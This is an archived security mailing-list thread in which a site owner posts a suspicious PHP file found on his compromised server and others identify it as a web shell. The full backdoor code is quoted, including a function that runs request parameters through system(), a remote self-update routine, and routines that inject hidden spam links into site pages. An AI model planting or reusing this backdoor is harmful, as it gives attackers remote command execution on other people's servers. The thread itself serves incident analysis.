PaulDotCom mailing list archives
Odd PHP file, trying to find out what it does
From: dimitrios at gmail.com (Dimitrios Kapsalis)
Date: Mon, 1 Mar 2010 11:14:54 -0600
Google this tag: <adsttnmq1> which is seen in the code above. This looks to be an older attack that came up around 3/24/09. On Mon, Mar 1, 2010 at 10:29 AM, Andrew Ellis <only.samurai at gmail.com>wrote:
This is pretty heavily obscured (obviously), but the structure and some of the things it's doing is reminiscent of PHP Shell, like C99. Code like: function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } Is used to pass things through the web-page to the server, allowing the malicious user to control things more granularly. I copied all the code you posted to a server and ran it through php at the command line. If you add in something like $_POST['c'] = "ls > test.txt" to the top of the file and run it, you'll find no output on the page, but a nicely created test.txt file with the contents of the directory containing this script... Sad to say, looks like you were 0wned. On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:Ok, I think one of my sites may have been compromised. I found thefollowingPHP script on a site, but I'm not sure what it is trying to do. Anyoneelseever seen this script before? Adrian <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function UpKos() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><sdioyslkjs2> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fp = fopen($mpt, "r"); GetVar("drs", $drs); $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['uk']) || isset($_GET['uk'])) { UpKos(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?> _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com-- Andrew Ellis http://blog.psych0tik.net _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100301/79a6b2c6/attachment.htm
Current thread:
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does David Hoelzer (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Bradley McMahon (Mar 01)
- Odd PHP file, trying to find out what it does Dimitrios Kapsalis (Mar 01)
- Odd PHP file, trying to find out what it does Jim Halfpenny (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)